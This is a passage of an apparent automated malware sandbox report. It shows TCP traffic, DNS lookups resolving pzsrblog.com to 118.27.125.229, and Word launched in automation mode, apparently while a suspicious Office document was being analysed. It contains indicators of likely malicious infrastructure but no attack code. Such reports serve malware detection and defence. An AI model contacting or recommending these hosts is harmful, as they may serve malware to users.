    Dec 20, 2022 14:08:02.497220039 CET44349175118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:02.497322083 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:02.497358084 CET44349175118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:02.497422934 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:02.512947083 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:02.513202906 CET44349175118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:02.513262033 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:02.513427973 CET49175443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:04.203759909 CET49176443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:04.203811884 CET44349176118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:04.203902960 CET49176443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:04.204251051 CET49176443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:04.204268932 CET44349176118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:04.784801006 CET44349176118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:04.785031080 CET49176443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:04.806432009 CET49176443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:04.806485891 CET44349176118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:04.807271004 CET44349176118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:04.837964058 CET49176443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:04.838026047 CET44349176118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:05.358891010 CET44349176118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:05.358973026 CET44349176118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:05.359105110 CET49176443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:05.359148026 CET49176443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:05.359164953 CET44349176118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:09.436860085 CET49177443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:09.436899900 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:09.436964989 CET49177443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:09.438842058 CET49177443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:09.438859940 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.057029963 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.057256937 CET49177443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:10.064673901 CET49177443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:10.064733982 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.065263987 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.099788904 CET49177443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:10.099848986 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.668241978 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.668354988 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.668445110 CET49177443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:10.668802977 CET49177443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:10.668828964 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.668850899 CET49177443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:10.668858051 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.668876886 CET49177443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:10.668881893 CET44349177118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.669096947 CET49178443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:10.669173956 CET44349178118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:10.669255018 CET49178443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:10.669528008 CET49178443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:10.669563055 CET44349178118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:11.254982948 CET44349178118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:11.257827997 CET49178443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:11.257889032 CET44349178118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:11.259048939 CET49178443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:11.259067059 CET44349178118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:11.835972071 CET44349178118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:11.837253094 CET49178443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:11.868597984 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:11.868653059 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:11.868730068 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:11.868887901 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:11.868901968 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:12.451721907 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:12.451900005 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:12.474200964 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:12.474298000 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:12.474988937 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:12.475095034 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:12.498498917 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:12.498554945 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:13.019915104 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:13.020112038 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:13.020152092 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:13.020190001 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:13.020262003 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:13.020289898 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:13.020311117 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:13.020364046 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:13.020445108 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:13.020512104 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:13.441339970 CET49179443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:13.441390038 CET44349179118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:13.619105101 CET49180443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:13.619155884 CET44349180118.27.125.229192.168.2.22
    Dec 20, 2022 14:08:13.619230032 CET49180443192.168.2.22118.27.125.229
    Dec 20, 2022 14:08:13.619653940 CET49180443192.168.2.22118.27.125.229

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Dec 20, 2022 14:08:00.933084011 CET4968853192.168.2.228.8.8.8
    Dec 20, 2022 14:08:01.202795029 CET53496888.8.8.8192.168.2.22
    Dec 20, 2022 14:08:03.900677919 CET5883653192.168.2.228.8.8.8
    Dec 20, 2022 14:08:04.172363997 CET53588368.8.8.8192.168.2.22
    Dec 20, 2022 14:08:04.183038950 CET5013453192.168.2.228.8.8.8
    Dec 20, 2022 14:08:04.202842951 CET53501348.8.8.8192.168.2.22
    Dec 20, 2022 14:08:09.143189907 CET5527553192.168.2.228.8.8.8
    Dec 20, 2022 14:08:09.410435915 CET53552758.8.8.8192.168.2.22
    Dec 20, 2022 14:08:09.418085098 CET5991553192.168.2.228.8.8.8
    Dec 20, 2022 14:08:09.436068058 CET53599158.8.8.8192.168.2.22
    Dec 20, 2022 14:08:16.610516071 CET5440853192.168.2.228.8.8.8
    Dec 20, 2022 14:08:16.630496025 CET53544088.8.8.8192.168.2.22
    Dec 20, 2022 14:08:16.633646965 CET5010853192.168.2.228.8.8.8
    Dec 20, 2022 14:08:16.889527082 CET53501088.8.8.8192.168.2.22

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Dec 20, 2022 14:08:00.933084011 CET192.168.2.228.8.8.80x2507Standard query (0)pzsrblog.comA (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:03.900677919 CET192.168.2.228.8.8.80x1150Standard query (0)pzsrblog.comA (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:04.183038950 CET192.168.2.228.8.8.80x1aacStandard query (0)pzsrblog.comA (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:09.143189907 CET192.168.2.228.8.8.80xdc64Standard query (0)pzsrblog.comA (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:09.418085098 CET192.168.2.228.8.8.80xbe50Standard query (0)pzsrblog.comA (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:16.610516071 CET192.168.2.228.8.8.80xc9bStandard query (0)pzsrblog.comA (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:16.633646965 CET192.168.2.228.8.8.80xa51fStandard query (0)pzsrblog.comA (IP address)IN (0x0001)false

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Dec 20, 2022 14:08:01.202795029 CET8.8.8.8192.168.2.220x2507No error (0)pzsrblog.com118.27.125.229A (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:04.172363997 CET8.8.8.8192.168.2.220x1150No error (0)pzsrblog.com118.27.125.229A (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:04.202842951 CET8.8.8.8192.168.2.220x1aacNo error (0)pzsrblog.com118.27.125.229A (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:09.410435915 CET8.8.8.8192.168.2.220xdc64No error (0)pzsrblog.com118.27.125.229A (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:09.436068058 CET8.8.8.8192.168.2.220xbe50No error (0)pzsrblog.com118.27.125.229A (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:16.630496025 CET8.8.8.8192.168.2.220xc9bNo error (0)pzsrblog.com118.27.125.229A (IP address)IN (0x0001)false
    Dec 20, 2022 14:08:16.889527082 CET8.8.8.8192.168.2.220xa51fNo error (0)pzsrblog.com118.27.125.229A (IP address)IN (0x0001)false

    HTTP Request Dependency Graph

    • pzsrblog.com

    Statistics

    No statistics

    System Behavior

    General

    Target ID:0
    Start time:14:07:14
    Start date:20/12/2022
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13f9d0000
    File size:1423704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    No disassembly